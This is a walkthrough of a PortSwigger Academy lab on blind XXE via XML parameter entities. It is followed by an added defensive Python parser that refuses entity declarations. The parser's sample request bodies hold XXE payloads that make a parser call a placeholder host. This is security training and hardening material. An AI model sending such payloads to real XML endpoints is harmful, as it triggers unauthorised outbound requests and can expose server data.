Solving Portswigger Academy: Blind XXE with out-of-band interaction via XML parameter entities
This lab has a “Check stock” feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.
To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
Let’s start by visiting the lab and clicking on any product. Then check the stock. Send the POST request to Check Stock to Repeater.
I will first try to use the payload used in the previous lab.

But it says “Entities are not allowed for security reasons”. As per HackTricks, in such a case we need to use XML parameter entities.
What are parameter entities?

Payload used:

Make note of the space between the % sign and the entity name. When I sent the request with the above payload, it said “Invalid Product ID”.

This time it says “parsing error”, but when I checked Burp Collaborator, I saw the DNS and HTTP requests.

This is how we solve the lab.
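The lab's filter blocks regular external entities but still lets the parser act on parameter entities. As an added defender-side example (not code from the lab or from PortSwigger), here is a hypothetical hardened stock-check parser built on Python's stdlib expat binding that refuses both kinds of entity declaration before the parser could issue any DNS or HTTP lookup; the sample request bodies and the collab.example host are constructed placeholders.

```python
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """The stock-check XML carried an entity declaration or external reference."""


def parse_stock_check(xml_text: str) -> str:
    """Return productId, refusing any entity declaration or external reference."""
    parser = expat.ParserCreate()
    # Never fetch or expand parameter entities (what the %xxe; trick relies on).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    state = {"in_product": False, "product_id": ""}

    def entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Fires for both <!ENTITY xxe ...> and <!ENTITY % xxe ...>, so general and
        # parameter entities are refused before any lookup could be attempted.
        kind = "parameter" if is_parameter else "general"
        raise UnsafeXmlError(f"{kind} entity '{name}' declared; request rejected")

    def external_ref(context, base, system_id, public_id):
        raise UnsafeXmlError(f"external entity reference {system_id!r} rejected")

    def start(name, attrs):
        state["in_product"] = name == "productId"

    def chars(data):
        if state["in_product"]:
            state["product_id"] += data

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda name: state.update(in_product=False)
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)  # handler exceptions propagate out of Parse
    return state["product_id"].strip()


def classify(xml_text: str) -> tuple:
    """Return ("accepted", productId) or ("rejected", reason) for a request body."""
    try:
        return ("accepted", parse_stock_check(xml_text))
    except UnsafeXmlError as exc:
        return ("rejected", str(exc))


# Constructed sample bodies; collab.example is a placeholder host, not a real target.
BENIGN = '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
GENERAL = ('<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "http://collab.example/">]>'
           '<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')
PARAMETER = ('<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://collab.example/"> %xxe; ]>'
             '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
```

In a real service the same rejection should be logged, since a DOCTYPE with entity declarations in a stock-check body is itself a useful detection signal.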